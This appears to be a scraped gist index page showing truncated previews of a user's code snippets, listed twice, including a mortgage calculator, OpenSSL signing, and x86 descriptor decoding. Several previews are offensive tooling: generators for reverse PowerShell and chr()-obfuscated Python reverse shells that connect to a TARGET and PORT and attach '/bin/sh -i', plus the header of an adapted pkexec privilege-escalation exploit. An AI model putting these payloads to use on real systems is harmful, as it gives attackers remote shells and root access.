Enrique Elias Nissim n3k

## gist:e4c6076d5a4a9028208d1807580959fa
from scipy.optimize import fsolve

# Given values
P = 440000  # principal (loan amount)
M = 2891    # monthly payment
n = 360     # number of payments (30 years * 12 months)

# Mortgage payment formula: M = P * [r(1 + r)^n] / [(1 + r)^n - 1]
# We need to solve this for r

## rust_ptrs.rs
#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_ptr1() {
        let x = 5;
        let y = &x as *const i32;

        assert_eq!(unsafe {*y}, 5);

## signature_verification.c
// $ openssl genpkey -algorithm RSA -out private_key.pem
// $ openssl rsa -pubout -in private_key.pem -out public_key.pem
// $ echo "This is my super secret message I would like to sign" > message.txt

/// gcc foo.c -lssl -lcrypto

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pem.h>

## x86_seg_descriptor_decode.py
import sys

def print_descriptor(desc):
    limit_low = desc & 0xffff
    base_low  = (desc >> 16) & 0xffff
    base_mid  = (desc >> 32) & 0xff
    access_byte = (desc >> 40) & 0xff
    limit_high =  (desc >> 48) & 0xf
    flags      = (desc >> 52) & 0xf
    base_high  = (desc >> 56) & 0xff

## javatls_server.java
package com.debugbreak.javatls;

import java.io.*;
import java.net.InetSocketAddress;

import com.sun.net.httpserver.HttpsServer;
import java.security.KeyStore;
import java.security.cert.X509Certificate;

import javax.net.ssl.KeyManagerFactory;

## mkpsrevshell.py
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#

import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])

## encoded_revshell_gen2.py
#!/usr/bin/python
import base64

C_TEMPLATE = """socket=__import__(chr(115)+chr(111)+chr(99)+chr(107)+chr(101)+chr(116));
subprocess=__import__(chr(115)+chr(117)+chr(98)+chr(112)+chr(114)+chr(111)+chr(99)+chr(101)+chr(115)+chr(115));
os=__import__(chr(111)+chr(115));s=socket.socket();s.connect((TARGET,PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([chr(47)+chr(98)+chr(105)+chr(110)+chr(47)+chr(115)+chr(104),chr(45)+chr(105)]);
"""

def encode_ip(ip_addr):
    parts = ip_addr.split(".")

## hexdump.c
void hexdump(unsigned char *data, size_t size) {
	char ascii[17] = {0};
	size_t i;

	for (i = 0; i < size; ++i) {
		unsigned char c = data[i];
		size_t next = i+1;
		printf("%02X ", c);
		ascii[i % 16] = isprint(c) ? c : '.';
		if (next % 8 == 0 || next == size) {

## pkexec.c
/*
 * For original see haxx.in/files/blasty-vs-pkexec.c
 *
 * this version is just using some awful hack to
 * avoid having to call gcc on the target box.
 * this versions fragile - must be named payload.so
 * might add better detection later, whatever.
 * all credit to bl4sty for the actual exploit,
 * I just made some changes for my usecase.
 * you will have to change the interp for diff

## encoded_revshell_gen.py
#!/usr/bin/python
import base64

C_TEMPLATE = """socket=__import__(chr(115)+chr(111)+chr(99)+chr(107)+chr(101)+chr(116));
subprocess=__import__(chr(115)+chr(117)+chr(98)+chr(112)+chr(114)+chr(111)+chr(99)+chr(101)+chr(115)+chr(115));
os=__import__(chr(111)+chr(115));s=socket.socket();s.connect((TARGET,PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([chr(47)+chr(98)+chr(105)+chr(110)+chr(47)+chr(115)+chr(104),chr(45)+chr(105)]);
"""

def encode_ip(ip_addr):
    parts = ip_addr.split(".")
	from scipy.optimize import fsolve

	# Given values
	P = 440000 # principal (loan amount)
	M = 2891 # monthly payment
	n = 360 # number of payments (30 years * 12 months)

	# Mortgage payment formula: M = P * [r(1 + r)^n] / [(1 + r)^n - 1]
	# We need to solve this for r
	#[cfg(test)]
	mod tests {
	use super::*;

	#[test]
	fn test_ptr1() {
	let x = 5;
	let y = &x as *const i32;

	assert_eq!(unsafe {*y}, 5);
	// $ openssl genpkey -algorithm RSA -out private_key.pem
	// $ openssl rsa -pubout -in private_key.pem -out public_key.pem
	// $ echo "This is my super secret message I would like to sign" > message.txt

	/// gcc foo.c -lssl -lcrypto

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <openssl/pem.h>
	import sys

	def print_descriptor(desc):
	limit_low = desc & 0xffff
	base_low = (desc >> 16) & 0xffff
	base_mid = (desc >> 32) & 0xff
	access_byte = (desc >> 40) & 0xff
	limit_high = (desc >> 48) & 0xf
	flags = (desc >> 52) & 0xf
	base_high = (desc >> 56) & 0xff
	package com.debugbreak.javatls;

	import java.io.*;
	import java.net.InetSocketAddress;

	import com.sun.net.httpserver.HttpsServer;
	import java.security.KeyStore;
	import java.security.cert.X509Certificate;

	import javax.net.ssl.KeyManagerFactory;
	#!/usr/bin/env python3
	#
	# generate reverse powershell cmdline with base64 encoded args
	#

	import sys
	import base64

	def help():
	print("USAGE: %s IP PORT" % sys.argv[0])
	#!/usr/bin/python
	import base64

	C_TEMPLATE = """socket=__import__(chr(115)+chr(111)+chr(99)+chr(107)+chr(101)+chr(116));
	subprocess=__import__(chr(115)+chr(117)+chr(98)+chr(112)+chr(114)+chr(111)+chr(99)+chr(101)+chr(115)+chr(115));
	os=__import__(chr(111)+chr(115));s=socket.socket();s.connect((TARGET,PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([chr(47)+chr(98)+chr(105)+chr(110)+chr(47)+chr(115)+chr(104),chr(45)+chr(105)]);
	"""

	def encode_ip(ip_addr):
	parts = ip_addr.split(".")
	void hexdump(unsigned char *data, size_t size) {
	char ascii[17] = {0};
	size_t i;

	for (i = 0; i < size; ++i) {
	unsigned char c = data[i];
	size_t next = i+1;
	printf("%02X ", c);
	ascii[i % 16] = isprint(c) ? c : '.';
	if (next % 8 == 0 \|\| next == size) {
	/*
	* For original see haxx.in/files/blasty-vs-pkexec.c
	*
	* this version is just using some awful hack to
	* avoid having to call gcc on the target box.
	* this versions fragile - must be named payload.so
	* might add better detection later, whatever.
	* all credit to bl4sty for the actual exploit,
	* I just made some changes for my usecase.
	* you will have to change the interp for diff